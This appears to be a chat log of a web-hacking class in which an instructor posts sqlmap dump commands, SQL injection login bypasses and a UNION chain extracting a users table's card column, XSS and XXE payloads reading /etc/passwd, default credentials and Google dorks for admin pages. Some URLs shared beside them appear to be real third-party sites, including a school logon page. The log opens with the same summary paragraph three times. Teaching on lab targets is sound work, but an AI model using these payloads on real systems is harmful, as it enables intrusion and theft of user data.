The document appears to be notes from an instructor sharing URLs, commands, and payloads related to vulnerability testing and exploitation with students. It includes URLs for vulnerable sites to test SQL injection and XXE, commands for installing sqlmap and dumping databases, default credentials to test, and payloads to test for vulnerabilities like stored and reflected XSS, SQLi, and XXE. The instructor is demonstrating how to scan for vulnerabilities and try exploitation.
The document appears to be notes from an instructor sharing URLs, commands, and payloads related to vulnerability testing and exploitation with students. It includes URLs for vulnerable sites to test SQL injection and XXE, commands for installing sqlmap and dumping databases, default credentials to test, and payloads to test for vulnerabilities like stored and reflected XSS, SQLi, and XXE. The instructor is demonstrating how to scan for vulnerabilities and try exploitation.
The document appears to be notes from an instructor sharing URLs, commands, and payloads related to vulnerability testing and exploitation with students. It includes URLs for vulnerable sites to test SQL injection and XXE, commands for installing sqlmap and dumping databases, default credentials to test, and payloads to test for vulnerabilities like stored and reflected XSS, SQLi, and XXE. The instructor is demonstrating how to scan for vulnerabilities and try exploitation.
Instructor to Everyone 09:25 AM dirb http://testphp.vulnweb.
com
Instructor to Everyone 09:25 AM http://www.hrithikrules.com/
Instructor to Everyone 09:25 AM https://vetritravels.com/ Instructor to Everyone 09:34 AM https://demo.testfire.net/login.jsp Instructor to Everyone 09:34 AM 1'or'1=1 Instructor to Everyone 09:39 AM inurl:adminlogin.php Instructor to Everyone 09:39 AM inurl:adminlogin.asp inurl:adminlogin.aspx Instructor to Everyone 09:42 AM https://github.com/payloadbox/sql-injection- payload-list Instructor to Everyone 09:43 AM admin/admin Instructor to Everyone 10:12 AM * Instructor to Everyone 10:12 AM ' Instructor to Everyone 10:12 AM " Instructor to Everyone 10:16 AM https://www.freecodecamp.org/news/how-to- protect-against-sql-injection-attacks/ Instructor to Everyone 10:25 AM --dump-all Instructor to Everyone 10:25 AM sqlmap -u https://testsite.com/page.php?id=1 -D <db_name> --tables Instructor to Everyone 10:25 AM sqlmap -u http://testsite.com/page.php?id=1 -- dbs Instructor to Everyone 10:30 AM apt install sqlmap
Instructor to Everyone 10:30 AM sudo apt install sqlmap
Instructor to Everyone 10:35 AM https://demo.testfire.net/login.jsp
Instructor to Everyone 10:43 AM ‘ or 1=1 – – Instructor to Everyone 11:31 AM ‘ or 1=1 – – Instructor to Everyone 11:35 AM admin’ -- admin’ # admin’/* ‘ or 1=1 -- ‘ or 1=1# ‘ or 1=1/* ‘) or ‘1’=’1 -- ‘) or (‘1’=’1 -- Instructor to Everyone 11:37 AM sql/sql i Instructor to Everyone 12:02 PM testphp.vulnweb.com/artists.php?artist=1' Instructor to Everyone 12:02 PM http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3 Instructor to Everyone 12:02 PM http://testphp.vulnweb.com/artists.php?artist=- 1 union select 1,database(),3 Instructor to Everyone 12:11 PM testphp.vulnweb.com/artists.php?artist=1' http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3 http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,database(),3 http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),current_user() http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1 http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(cc),3 from users Instructor to Everyone 12:33 PM admin/admin Instructor to Everyone 12:33 PM test/test Instructor to Everyone 12:33 PM admin/password Instructor to Everyone 12:36 PM arrows Instructor to Everyone 12:37 PM https://www.lowellschools.com/Core/Guests/Logon?ReturnUrl=%2four-district %2fdepartments%2flibrary--media-services%2fhigh-school-textbooks%2f Instructor to Everyone 12:37 PM http://testphp.vulnweb.com test/test Instructor to Everyone 12:38 PM https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default- Credentials Instructor to Everyone 12:47 PM https://portswigger.net/web-security/dashboard Instructor to Everyone 01:03 PM Unprotected admin functionality with unpredictable URL Instructor to Everyone 01:09 PM https://portswigger.net/burp/communitydownload Instructor to Everyone 01:12 PM https://portswigger.net/burp/communitydownload Instructor to Everyone 01:22 PM 127.0.0.1 Instructor to Everyone 01:22 PM 8080 Instructor to Everyone 01:24 PM http://burp Instructor to Everyone 01:26 PM https://portswigger.net/burp/documentation/desktop/external-browser-config/ certificate/ca-cert-chrome-windows Instructor to Everyone 03:13 PM https://google-gruyere.appspot.com/ Instructor to Everyone 03:15 PM <script>alert(document.cookie)</script> Instructor to Everyone 03:57 PM <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> &passwd; Instructor to Everyone 03:59 PM &xxe; Instructor to Everyone 04:05 PM <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> Instructor to Everyone 04:08 PM https://github.com/payloadbox/xxe-injection- payload-list Instructor to Everyone 04:11 PM xxe; Instructor to Everyone 04:14 PM <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> Instructor to Everyone 04:17 PM &xxe;